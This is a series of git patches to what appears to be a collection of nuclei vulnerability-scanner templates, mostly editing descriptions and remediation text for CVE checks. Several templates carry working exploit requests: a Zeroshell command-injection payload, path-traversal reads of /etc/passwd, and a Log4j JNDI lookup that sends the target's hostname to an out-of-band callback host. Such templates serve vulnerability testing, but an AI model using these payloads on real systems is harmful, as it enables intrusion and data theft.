+
requests:
- raw:
- |
From 6378a1ab1a2ef5c1b533c90648ed6302a3403b6c Mon Sep 17 00:00:00 2001
From: sullo
Date: Fri, 4 Mar 2022 15:58:39 -0500
Subject: [PATCH 030/259] Update CVSS information and text content
---
vulnerabilities/gitlab/gitlab-rce.yaml | 13 ++++++++-----
1 file changed, 8 insertions(+), 5 deletions(-)
diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml
index b8a81b603a..8e2b327c8c 100644
--- a/vulnerabilities/gitlab/gitlab-rce.yaml
+++ b/vulnerabilities/gitlab/gitlab-rce.yaml
@@ -1,10 +1,11 @@
id: gitlab-rce
info:
- name: GitLab CE/EE Unauthenticated RCE using ExifTool
+ name: GitLab CE/EE Unauthenticated RCE Using ExifTool
author: pdteam
severity: critical
- description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
+ description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2.
+ remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher.
reference:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
@@ -12,8 +13,8 @@ info:
metadata:
shodan-query: http.title:"GitLab"
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 9.90
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
cve-id: CVE-2021-22205
cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce,oast,intrusive
@@ -57,4 +58,6 @@ requests:
part: interactsh_request
group: 1
regex:
- - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
\ No newline at end of file
+ - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
+
+# Enhanced by CS 2021/03/04
From ebaf71e728d01489ffc00b9caeb9321826e9f099 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:27:52 -0500
Subject: [PATCH 031/259] Enhancement: cves/2010/CVE-2010-1540.yaml by mp
---
cves/2010/CVE-2010-1540.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml
index 1bc5d76633..69956acbc1 100644
--- a/cves/2010/CVE-2010-1540.yaml
+++ b/cves/2010/CVE-2010-1540.yaml
@@ -1,16 +1,17 @@
id: CVE-2010-1540
+
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
- remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1540
+
requests:
- method: GET
path:
@@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
-# Enhanced by mp on 2022/02/15
+
+# Enhanced by mp on 2022/03/06
From 57ab79164bc6bc20c0e96f1c8b066b87a50de5e7 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:31:51 -0500
Subject: [PATCH 032/259] Enhancement: cves/2021/CVE-2021-40868.yaml by mp
---
cves/2021/CVE-2021-40868.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml
index c688da0f0f..681c7f8d84 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@@ -1,10 +1,11 @@
id: CVE-2021-40868
info:
- name: Cloudron 6.2 Cross Site Scripting
+ name: Cloudron 6.2 Cross-Site Scripting
author: daffainfo
severity: medium
- description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
+ description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
+ remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
@@ -35,3 +36,5 @@ requests:
words:
- ''
part: body
+
+# Enhanced by mp on 2022/03/06
From b03d23b03548541f4d8f262e6b46a3463bef25cb Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:35:55 -0500
Subject: [PATCH 033/259] Enhancement: cves/2021/CVE-2021-40870.yaml by mp
---
cves/2021/CVE-2021-40870.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml
index a7237d6d7c..71abc2a141 100644
--- a/cves/2021/CVE-2021-40870.yaml
+++ b/cves/2021/CVE-2021-40870.yaml
@@ -1,11 +1,12 @@
id: CVE-2021-40870
info:
- name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
+ name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
author: pikpikcu
severity: critical
- description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
+ description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
+ - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
tags: cve,cve2021,rce,aviatrix
@@ -41,3 +42,5 @@ requests:
- "PHP Extension"
- "PHP Version"
condition: and
+
+# Enhanced by mp on 2022/03/06
From 0739f98dc7d37565c56e767c549f4c1c5b3cfa4b Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:41:44 -0500
Subject: [PATCH 034/259] Enhancement: cves/2021/CVE-2021-40875.yaml by mp
---
cves/2021/CVE-2021-40875.yaml | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)
diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml
index 4144e75270..d018020152 100644
--- a/cves/2021/CVE-2021-40875.yaml
+++ b/cves/2021/CVE-2021-40875.yaml
@@ -1,16 +1,16 @@
id: CVE-2021-40875
info:
- name: Gurock TestRail Application files.md5 exposure
+ name: Gurock TestRail Application files.md5 Exposure
author: oscarintherocks
severity: medium
- description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+ description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
tags: cve,cve2021,exposure,gurock,testrail
reference:
- https://github.com/SakuraSamuraii/derailed
- https://johnjhacking.com/blog/cve-2021-40875/
- https://www.gurock.com/testrail/tour/enterprise-edition
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
+ - htttps://github.com/SakuraSamuraii/derailed
+ - https://johnjhacking.com/blog/cve-2021-40875/
+ - https://www.gurock.com/testrail/tour/enterprise-edition
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
classification:
cve-id: CVE-2021-40875
metadata:
@@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/06
From b20659acef6dcfbca98e547fb9af46fac917fb74 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:43:48 -0500
Subject: [PATCH 035/259] Enhancement: cves/2021/CVE-2021-40960.yaml by mp
---
cves/2021/CVE-2021-40960.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml
index 8702b53d29..74f5e5e2cc 100644
--- a/cves/2021/CVE-2021-40960.yaml
+++ b/cves/2021/CVE-2021-40960.yaml
@@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/06
From 220bc5a35a9b87b77172f7826286aa121b6c0ca7 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:50:17 -0500
Subject: [PATCH 036/259] Enhancement: cves/2021/CVE-2021-40978.yaml by mp
---
cves/2021/CVE-2021-40978.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
index 81ec5d959e..157e96c654 100644
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -1,14 +1,15 @@
id: CVE-2021-40978
info:
- name: mkdocs 1.2.2 built-in dev-server allows directory traversal
+ name: MKdocs 1.2.2 Directory Traversal
author: pikpikcu
severity: high
reference:
+ - https://github.com/mkdocs/mkdocs/pull/2604
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
- description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
+ description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/06
From 739edecc0fd12f35d35e2696ed06dab52dcc35be Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:52:34 -0500
Subject: [PATCH 037/259] Enhancement: cves/2021/CVE-2021-41174.yaml by mp
---
cves/2021/CVE-2021-41174.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml
index 241b7b0b94..275fb22f63 100644
--- a/cves/2021/CVE-2021-41174.yaml
+++ b/cves/2021/CVE-2021-41174.yaml
@@ -1,10 +1,11 @@
id: CVE-2021-41174
info:
- name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
+ name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
+ remediation: Upgrade to 8.2.3 or higher.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
@@ -43,4 +44,6 @@ requests:
- type: regex
group: 1
regex:
- - '"subTitle":"Grafana ([a-z0-9.]+)'
\ No newline at end of file
+ - '"subTitle":"Grafana ([a-z0-9.]+)'
+
+# Enhanced by mp on 2022/03/06
From 92aa22ebe82458b8912d40f82fbe34114ebcd632 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:56:57 -0500
Subject: [PATCH 038/259] Enhancement: cves/2021/CVE-2021-41266.yaml by mp
---
cves/2021/CVE-2021-41266.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41266.yaml b/cves/2021/CVE-2021-41266.yaml
index 37b62119d8..9819fab0ae 100644
--- a/cves/2021/CVE-2021-41266.yaml
+++ b/cves/2021/CVE-2021-41266.yaml
@@ -5,7 +5,8 @@ info:
author: alevsk
severity: critical
description: |
- Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.
+ MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
+ remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41266
- https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
@@ -43,4 +44,6 @@ requests:
- type: word
part: header
words:
- - "token"
\ No newline at end of file
+ - "token"
+
+# Enhanced by mp on 2022/03/06
From 925f08ff7065a3402647692e149f7e81681679a3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 12:01:47 -0500
Subject: [PATCH 039/259] Enhancement: cves/2021/CVE-2021-41277.yaml by mp
---
cves/2021/CVE-2021-41277.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml
index d47d490eac..77f4a745a7 100644
--- a/cves/2021/CVE-2021-41277.yaml
+++ b/cves/2021/CVE-2021-41277.yaml
@@ -4,7 +4,8 @@ info:
name: Metabase Local File Inclusion
author: 0x_Akoko
severity: critical
- description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
+ description: "Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded."
+ remediation: "This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application."
reference:
- https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
- https://nvd.nist.gov/vuln/detail/CVE-2021-41277
@@ -33,4 +34,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/06
From d743fb7969ea95d414cf46ebf676d984f31011eb Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 12:04:24 -0500
Subject: [PATCH 040/259] Enhancement: cves/2021/CVE-2021-41291.yaml by mp
---
cves/2021/CVE-2021-41291.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml
index b093e562b9..1b052e2df4 100644
--- a/cves/2021/CVE-2021-41291.yaml
+++ b/cves/2021/CVE-2021-41291.yaml
@@ -4,8 +4,9 @@ info:
name: ECOA Building Automation System - Directory Traversal Content Disclosure
author: gy741
severity: high
- description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+ description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41291
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
tags: cve,cve2021,ecoa,lfi,traversal
@@ -25,3 +26,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
+
+# Enhanced by mp on 2022/03/06
From 2ad18547528bc7aaa8244ea88e592e0d7012517e Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 12:04:57 -0500
Subject: [PATCH 041/259] Enhancement: cves/2010/CVE-2010-1601.yaml by mp
---
cves/2010/CVE-2010-1601.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml
index adea054fa7..23a11eb61b 100644
--- a/cves/2010/CVE-2010-1601.yaml
+++ b/cves/2010/CVE-2010-1601.yaml
@@ -1,16 +1,17 @@
id: CVE-2010-1601
+
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
- remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1601
+
requests:
- method: GET
path:
@@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
-# Enhanced by mp on 2022/02/15
+
+# Enhanced by mp on 2022/03/06
From 1667fd79cbecd8a0585eea3949d1c0ceb6a2634a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:05:17 +0530
Subject: [PATCH 042/259] Update kibana-panel.yaml
---
exposed-panels/kibana-panel.yaml | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/exposed-panels/kibana-panel.yaml b/exposed-panels/kibana-panel.yaml
index ad3530bfef..a8976daca7 100644
--- a/exposed-panels/kibana-panel.yaml
+++ b/exposed-panels/kibana-panel.yaml
@@ -13,14 +13,17 @@ requests:
path:
- "{{BaseURL}}/login"
+ redirects: true
+ max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Kibana"
+ - "Elastic"
- - type: word
+ - type: regex
part: header
- words:
- - "Kbn-Name:"
+ regex:
+ - '(?i)(Kbn-Name)'
From 9587fcfcb8624873420af6964aea3977ea0be9a0 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:36:21 +0530
Subject: [PATCH 043/259] Update CVE-2019-12725.yaml
---
cves/2019/CVE-2019-12725.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml
index a381601f64..6f6f713ad4 100644
--- a/cves/2019/CVE-2019-12725.yaml
+++ b/cves/2019/CVE-2019-12725.yaml
@@ -20,14 +20,17 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
+ - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: regex
+ part: body
regex:
- - "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
+ - "root:.*:0:0:"
# Enhanced by mp on 2022/02/04
From 5f9caa4418561aac503d50b3bee2e1b931f9cbdb Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:37:03 +0530
Subject: [PATCH 044/259] Update CVE-2019-12725.yaml
---
cves/2019/CVE-2019-12725.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml
index 6f6f713ad4..3b92fcfa2f 100644
--- a/cves/2019/CVE-2019-12725.yaml
+++ b/cves/2019/CVE-2019-12725.yaml
@@ -2,7 +2,7 @@ id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
- author: dwisiswant0
+ author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
From fab7904544efd9e3c870d232640a2d5e74a21776 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:37:29 +0530
Subject: [PATCH 045/259] Update kibana-panel.yaml
---
exposed-panels/kibana-panel.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/exposed-panels/kibana-panel.yaml b/exposed-panels/kibana-panel.yaml
index a8976daca7..74bef2b479 100644
--- a/exposed-panels/kibana-panel.yaml
+++ b/exposed-panels/kibana-panel.yaml
@@ -2,7 +2,7 @@ id: kibana-panel
info:
name: Kibana Panel Login
- author: petruknisme,daffainfo
+ author: petruknisme,daffainfo,c-sh0
severity: info
metadata:
shodan-query: http.title:"Kibana"
From eb0395422f172565d4b4208ca71affd25cf23953 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Mon, 7 Mar 2022 07:58:38 +0900
Subject: [PATCH 046/259] Create boa-web-fileread.yaml
---
boa-web-fileread.yaml | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 boa-web-fileread.yaml
diff --git a/boa-web-fileread.yaml b/boa-web-fileread.yaml
new file mode 100644
index 0000000000..fa74016601
--- /dev/null
+++ b/boa-web-fileread.yaml
@@ -0,0 +1,27 @@
+id: boa-web-fileRead
+
+info:
+ name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
+ author: 0x_Akoko
+ severity: high
+ description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
+ reference:
+ - https://www.exploit-db.com/exploits/42290
+ - https://www.cvedetails.com/cve/CVE-2017-9833
+ tags: boa,fileread,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
From 1b814c3d0796c55749e4fe5bbdabc3c268093f4d Mon Sep 17 00:00:00 2001
From: Surya <65324191+bughuntersurya@users.noreply.github.com>
Date: Mon, 7 Mar 2022 04:43:20 -0500
Subject: [PATCH 047/259] Create vrealize-operations-tenant-app-log4j-rce.yaml
---
...alize-operations-tenant-app-log4j-rce.yaml | 41 +++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
diff --git a/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml b/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
new file mode 100644
index 0000000000..247b36f8e0
--- /dev/null
+++ b/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
@@ -0,0 +1,41 @@
+id: vrealize-operations-tenant-app-log4j-rce
+
+info:
+ name: vRealize Operations Tenant App Log4j JNDI RCE
+ author: bughuntersurya
+ severity: critical
+ description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
+ metadata:
+ shodan-query: http.title:"vRealize Operations Tenant App"
+ tags: rce,log4j,vmware,vrealize
+
+requests:
+ - raw:
+ - |
+ POST /suite-api/api/auth/token/acquire HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Origin: {{RootURL}}
+ Referer: {{RootURL}}/ui/
+
+
+ {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns" # Confirms the DNS Interaction
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
+ extractors:
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
From ac26863c5dd234b0d302ad645fca947979c63707 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 7 Mar 2022 15:46:57 +0530
Subject: [PATCH 048/259] template id/name update
---
...-app-log4j-rce.yaml => vrealize-operations-log4j-rce.yaml} | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
rename vulnerabilities/vmware/{vrealize-operations-tenant-app-log4j-rce.yaml => vrealize-operations-log4j-rce.yaml} (92%)
diff --git a/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
similarity index 92%
rename from vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
rename to vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
index 247b36f8e0..d6f307af86 100644
--- a/vulnerabilities/vmware/vrealize-operations-tenant-app-log4j-rce.yaml
+++ b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
@@ -1,10 +1,11 @@
-id: vrealize-operations-tenant-app-log4j-rce
+id: vrealize-operations-log4j-rce
info:
name: vRealize Operations Tenant App Log4j JNDI RCE
author: bughuntersurya
severity: critical
description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted vRealize Operations Tenant Application.
+ reference: https://www.vmware.com/security/advisories/VMSA-2021-0028.html
metadata:
shodan-query: http.title:"vRealize Operations Tenant App"
tags: rce,log4j,vmware,vrealize
@@ -17,7 +18,6 @@ requests:
Content-Type: application/json
Origin: {{RootURL}}
Referer: {{RootURL}}/ui/
-
{"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
From ba14674e227590ca3af0dfce761759ecc6703ac9 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Mon, 7 Mar 2022 19:19:01 +0900
Subject: [PATCH 049/259] Create CVE-2020-15050.yaml
An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
Signed-off-by: GwanYeong Kim
---
cves/2020/CVE-2020-15050.yaml | 29 +++++++++++++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 cves/2020/CVE-2020-15050.yaml
diff --git a/cves/2020/CVE-2020-15050.yaml b/cves/2020/CVE-2020-15050.yaml
new file mode 100644
index 0000000000..3fc4b0f9ba
--- /dev/null
+++ b/cves/2020/CVE-2020-15050.yaml
@@ -0,0 +1,29 @@
+id: CVE-2020-15050
+
+info:
+ name: Suprema BioStar2 - Local File Inclusion (LFI)
+ author: gy741
+ severity: high
+ description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
+ reference:
+ - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
+ tags: cve,cve2020,lfi,suprema,biostar2
+ classification:
